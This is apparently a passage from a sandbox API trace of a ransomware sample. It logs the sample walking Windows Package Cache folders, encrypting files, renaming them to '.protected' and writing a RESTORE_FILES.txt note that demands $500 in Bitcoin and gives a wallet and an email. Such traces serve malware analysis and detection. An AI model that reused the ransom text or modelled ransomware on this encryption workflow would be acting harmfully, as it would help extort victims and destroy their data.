lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0074.552] CloseHandle (hObject=0xd8) returned 1 [0074.553] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi.protected") returned 156 [0074.553] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi" (normalized: "c:\\programdata\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\packages\\vcruntimeadditional_amd64\\vc_runtimeadditional_x64.msi"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi.protected" (normalized: "c:\\programdata\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\packages\\vcruntimeadditional_amd64\\vc_runtimeadditional_x64.msi.protected")) returned 1 [0074.553] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0074.553] FindClose (in: hFindFile=0x447c80 | out: hFindFile=0x447c80) returned 1 [0074.554] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\RESTORE_FILES.txt") returned 135 [0074.554] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\packages\\vcruntimeadditional_amd64\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0074.587] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0074.587] WriteFile (in: hFile=0xd4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ec94*=0x53d, lpOverlapped=0x0) returned 1 [0074.588] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0074.588] WriteFile (in: hFile=0xd4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ec94*=0x2ac, lpOverlapped=0x0) returned 1 [0074.588] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0074.588] WriteFile (in: hFile=0xd4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ec94*=0xb1, lpOverlapped=0x0) returned 1 [0074.588] CloseHandle (hObject=0xd4) returned 1 [0074.589] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0074.589] FindClose (in: hFindFile=0x47b7a8 | out: hFindFile=0x47b7a8) returned 1 [0074.589] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\RESTORE_FILES.txt") returned 109 [0074.589] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\packages\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0074.590] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0074.590] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0074.591] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0074.591] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0074.591] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0074.591] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, lpOverlapped=0x0) returned 1 [0074.591] CloseHandle (hObject=0xb4) returned 1 [0074.592] FindNextFileW (in: hFindFile=0x490a28, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0074.592] FindClose (in: hFindFile=0x490a28 | out: hFindFile=0x490a28) returned 1 [0074.592] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\RESTORE_FILES.txt") returned 100 [0074.592] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0074.593] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0074.593] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0074.594] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0074.594] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0074.594] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0074.594] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, lpOverlapped=0x0) returned 1 [0074.594] CloseHandle (hObject=0xa4) returned 1 [0074.594] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0074.596] lstrcmpiW (lpString1="{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005", lpString2="Windows") returned -1 [0074.596] lstrcmpiW (lpString1="{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005", lpString2="Program Files") returned -1 [0074.609] lstrcmpiW (lpString1="{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005", lpString2="Program Files (x86)") returned -1 [0074.609] lstrcmpiW (lpString1="{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005", lpString2="$Recycle.bin") returned 1 [0074.609] lstrcmpiW (lpString1="{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005", lpString2="System Volume Information") returned -1 [0074.609] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005") returned 82 [0074.609] lstrcmpW (lpString1="{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005", lpString2=".") returned 1 [0074.609] lstrcmpW (lpString1="{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005", lpString2="..") returned 1 [0074.609] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\*") returned 84 [0074.609] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x490a28 [0074.610] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0074.610] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0074.610] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0074.610] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0074.610] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0074.610] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\.") returned 84 [0074.610] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0074.610] FindNextFileW (in: hFindFile=0x490a28, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0074.610] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0074.610] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0074.611] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0074.611] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0074.611] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0074.611] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\..") returned 85 [0074.611] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0074.611] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0074.611] FindNextFileW (in: hFindFile=0x490a28, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0074.611] lstrcmpiW (lpString1="packages", lpString2="Windows") returned -1 [0074.611] lstrcmpiW (lpString1="packages", lpString2="Program Files") returned -1 [0074.611] lstrcmpiW (lpString1="packages", lpString2="Program Files (x86)") returned -1 [0074.611] lstrcmpiW (lpString1="packages", lpString2="$Recycle.bin") returned 1 [0074.611] lstrcmpiW (lpString1="packages", lpString2="System Volume Information") returned -1 [0074.611] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages") returned 91 [0074.611] lstrcmpW (lpString1="packages", lpString2=".") returned 1 [0074.611] lstrcmpW (lpString1="packages", lpString2="..") returned 1 [0074.611] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\*") returned 93 [0074.611] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b7a8 [0074.612] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0074.612] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0074.612] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0074.612] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0074.612] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0074.612] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\.") returned 93 [0074.612] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0074.612] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0074.612] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0074.612] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0074.612] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0074.612] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0074.612] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0074.612] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\..") returned 94 [0074.612] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0074.612] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0074.612] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0074.612] lstrcmpiW (lpString1="vcRuntimeMinimum_amd64", lpString2="Windows") returned -1 [0074.612] lstrcmpiW (lpString1="vcRuntimeMinimum_amd64", lpString2="Program Files") returned 1 [0074.612] lstrcmpiW (lpString1="vcRuntimeMinimum_amd64", lpString2="Program Files (x86)") returned 1 [0074.612] lstrcmpiW (lpString1="vcRuntimeMinimum_amd64", lpString2="$Recycle.bin") returned 1 [0074.612] lstrcmpiW (lpString1="vcRuntimeMinimum_amd64", lpString2="System Volume Information") returned 1 [0074.612] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64") returned 114 [0074.612] lstrcmpW (lpString1="vcRuntimeMinimum_amd64", lpString2=".") returned 1 [0074.612] lstrcmpW (lpString1="vcRuntimeMinimum_amd64", lpString2="..") returned 1 [0074.613] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\*") returned 116 [0074.613] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x447c80 [0074.613] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0074.613] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0074.613] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0074.613] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0074.613] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0074.613] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\.") returned 116 [0074.613] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0074.613] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0074.613] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0074.613] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0074.613] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0074.613] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0074.613] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0074.613] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\..") returned 117 [0074.613] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0074.613] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0074.613] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0074.613] lstrcmpiW (lpString1="cab1.cab", lpString2="Windows") returned -1 [0074.613] lstrcmpiW (lpString1="cab1.cab", lpString2="Program Files") returned -1 [0074.613] lstrcmpiW (lpString1="cab1.cab", lpString2="Program Files (x86)") returned -1 [0074.613] lstrcmpiW (lpString1="cab1.cab", lpString2="$Recycle.bin") returned 1 [0074.614] lstrcmpiW (lpString1="cab1.cab", lpString2="System Volume Information") returned -1 [0074.614] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\cab1.cab") returned 123 [0074.614] StrStrIW (lpFirst="cab1.cab", lpSrch=".protected") returned 0x0 [0074.614] lstrcmpW (lpString1="cab1.cab", lpString2="RESTORE_FILES.txt") returned -1 [0074.614] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0074.614] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0074.614] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\packages\\vcruntimeminimum_amd64\\cab1.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0074.614] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\cab1.cab") returned 123 [0074.614] StrStrW (lpFirst="cab1.cab", lpSrch=".txt") returned 0x0 [0074.614] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\cab1.cab") returned 123 [0074.614] StrStrW (lpFirst="cab1.cab", lpSrch=".rar") returned 0x0 [0074.614] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\cab1.cab") returned 123 [0074.614] StrStrW (lpFirst="cab1.cab", lpSrch=".zip") returned 0x0 [0074.614] ReadFile (in: hFile=0xd8, lpBuffer=0x49e450, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0074.799] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.799] WriteFile (in: hFile=0xd8, lpBuffer=0x49e450*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0074.799] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0074.799] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, 